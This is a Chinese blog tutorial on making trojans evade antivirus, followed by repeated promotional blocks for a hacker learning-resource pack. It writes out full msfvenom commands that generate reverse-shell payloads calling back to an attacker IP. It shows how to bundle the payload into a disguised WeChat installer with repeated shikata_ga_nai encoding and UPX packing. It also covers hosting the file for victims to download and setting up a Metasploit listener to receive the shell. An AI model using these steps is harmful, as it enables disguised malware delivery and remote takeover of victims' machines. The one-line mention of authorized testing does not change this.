网络安全渗透测试之木马免杀奇技淫巧，从零基础到精通，收藏这篇就够了！

各位黑客大佬、安全萌新们，大家好！今天咱们来聊聊一个在网络安全圈里既神秘又实用的技能：木马免杀。啥是免杀？简单说，就是让你的木马病毒能够逃过杀毒软件的“法眼”，在目标系统里横行霸道（当然，咱们只在授权的渗透测试里这么玩）。

免杀技术，听起来有点“邪恶”，但它就像一把双刃剑。一方面，黑客可以用它来突破防御；另一方面，安全工程师也能用它来检验自家安全产品的防护能力。所以，掌握一些免杀技巧，对咱们网络安全从业者来说，绝对是技多不压身！

1、木马“裸奔”的惨痛教训

啥叫“裸奔马”？顾名思义，就是未经任何处理，直接用Msfvenom生成的木马。这种马，就像没穿衣服的小baby，一出门就被杀毒软件按在地上摩擦。

1、首先，咱们用Msfvenom生成一个名叫weixin.exe的裸奔马：

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.132 LPORT=8888 -f exe > weixin.exe

2、接下来，咱们在Kali上启动Apache服务，把weixin.exe扔到/var/www/html目录下，让目标机器能下载。

2.1、启动Apache服务，这步so easy！

2.2、把weixin.exe 放到/var/www/html，就像把小baby扔到大街上...

2.3、目标机器访问192.168.111.132/weixin.exe，Duang~ 下载完成！

2.4、然而，现实是残酷的... AV 毫不留情地查杀了它！

所以，在实战中，千万别直接扔裸奔马！太容易被发现了！

2.5、给大家推荐一个在线查杀网站：VirusTotal。上传你的木马，让几十种杀毒引擎帮你扫描，看看有没有“漏网之鱼”。

2、MSF编码：给木马穿上“隐身衣”

Metasploit 框架自带的编码器，可以对木马进行重新编码，就像给它穿上一层“隐身衣”，让杀毒软件难以识别。

1、在Kali终端输入msfvenom -l encoders，查看所有可用的编码格式。

2、为了更好地实现免杀，我们可以找一个正常的程序，把木马捆绑进去。这里咱们选择微信安装包WeChatSetup.exe。

把微信安装包放在/root目录下。

3、使用Msfvenom生成一个捆绑了微信安装包的木马WeChatSetup1.exe，并用x86/shikata_ga_nai编码器进行多次编码：

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.111.132 LPORT=9999 -e x86/shikata_ga_nai -x WeChatSetup.exe -i 12 -f exe -o /root/WeChatSetup1.exe

参数解释：

• -e：指定编码方式
• -x：指定捆绑的程序
• -i：编码次数
• -f：输出格式
• -o：输出路径

4、把WeChatSetup1.exe放到Apache服务的目录下，让目标机器下载。

5、在Msfconsole上创建监听：

use exploit/multi/handler
set payload windows/shell/reverse_tcp
show options
set lhost 192.168.111.132
set lport 9999
run

6、在目标机器上点击“伪装”的微信安装包，虽然安装失败（因为捆绑后文件可能损坏），但我们的攻击机已经成功上线！

3、UPX加壳：给木马再穿一件“马甲”

UPX 是一款免费的可执行文件压缩器，可以用来压缩和加壳程序。加壳可以改变木马的特征码，增加杀毒软件的识别难度。

1、Kali Linux 自带 UPX，直接输入upx查看参数。

2、使用upx file命令对文件进行加壳处理。加壳后，文件体积会变小。

3、把加壳后的weixin安装包放到 Apache 服务的目录下，供目标机器下载。

4、在 Msfconsole 上创建监听，成功获得 Shell！

总结

免杀技术是一场猫鼠游戏，安全厂商也在不断更新检测技术。所以，免杀技术也需要不断学习和研究。未来，我也会尝试用 Python、Go 等语言编写免杀工具，并在后续文章中分享我的进展！

希望这篇文章能帮助大家更好地理解木马免杀技术，并在网络安全领域更上一层楼！

黑客/网络安全学习包

资料目录

1. 成长路线图&学习规划

2. 配套视频教程

3. SRC&黑客文籍

4. 护网行动资料

5. 黑客必读书单

6. 面试题合集

因篇幅有限，仅展示部分资料，需要点击下方链接即可前往获取

*************************************优快云大礼包：《黑客&网络安全入门&进阶学习资源包》免费分享*************************************

1.成长路线图&学习规划

要学习一门新的技术，作为新手一定要先学习成长路线图，方向不对，努力白费。

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

因篇幅有限，仅展示部分资料，需要点击下方链接即可前往获取

*************************************优快云大礼包：《黑客&网络安全入门&进阶学习资源包》免费分享*************************************

2.视频教程

很多朋友都不喜欢晦涩的文字，我也为大家准备了视频教程，其中一共有21个章节，每个章节都是当前板块的精华浓缩。

因篇幅有限，仅展示部分资料，需要点击下方链接即可前往获取

*************************************优快云大礼包：《黑客&网络安全入门&进阶学习资源包》免费分享*************************************

3.SRC&黑客文籍

大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录

SRC技术文籍：

黑客资料由于是敏感资源，这里不能直接展示哦！

4.护网行动资料

其中关于HW护网行动，也准备了对应的资料，这些内容可相当于比赛的金手指！

5.黑客必读书单

**

**

6.面试题合集

当你自学到这里，你就要开始思考找工作的事情了，而工作绕不开的就是真题和面试题。

更多内容为防止和谐，可以扫描获取~

因篇幅有限，仅展示部分资料，需要点击下方链接即可前往获取

*************************************优快云大礼包：《黑客&网络安全入门&进阶学习资源包》免费分享*********************************